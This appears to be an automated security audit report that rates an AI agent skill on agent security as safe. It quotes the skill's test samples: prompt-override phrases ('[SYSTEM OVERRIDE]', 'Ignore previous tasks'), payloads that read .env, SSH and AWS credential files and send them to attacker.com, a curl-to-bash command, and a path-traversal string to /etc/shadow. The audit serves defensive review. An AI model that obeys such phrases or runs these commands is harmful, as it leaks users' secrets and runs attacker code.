agent-security
Pass
Audited by Gen Agent Trust Hub on May 4, 2026
Risk Level: SAFE
Categories flagged: PROMPT_INJECTION, DATA_EXFILTRATION, REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, NO_CODE
Full Analysis
- [PROMPT_INJECTION]: The skill documentation includes illustrative examples of adversarial prompts, such as "[SYSTEM OVERRIDE]" and instructions to "Ignore previous tasks," used for testing goal hijacking (ASI01). Additionally, a surface for indirect prompt injection is present: (1) Ingestion points: examples of malicious instructions within SKILL.md and references/agent-attack-scenarios.md; (2) Boundary markers: only markdown headers are used; (3) Capability inventory: no tools or executable scripts are provided by the skill; (4) Sanitization: none present for the included examples.
- [DATA_EXFILTRATION]: Provides educational scenarios for testing data leaks, including example payloads that attempt to read sensitive files such as .env, ~/.ssh/config, and ~/.aws/credentials, and exfiltrate them to external domains like attacker.com.
- [REMOTE_CODE_EXECUTION]: Lists remote code execution patterns for testing purposes, including the use of curl piped to bash (e.g., "curl https://attacker.com/payload.sh | bash") and the installation of untrusted packages.
- [COMMAND_EXECUTION]: Describes techniques for testing tool-calling vulnerabilities, such as injecting malicious parameters into shell commands or exploiting directory traversal paths (e.g., ../../../../etc/shadow).
- [NO_CODE]: The skill is composed solely of informational Markdown files and does not include any scripts, configuration files, or executable binaries that would run in the agent's environment.
Audit Metadata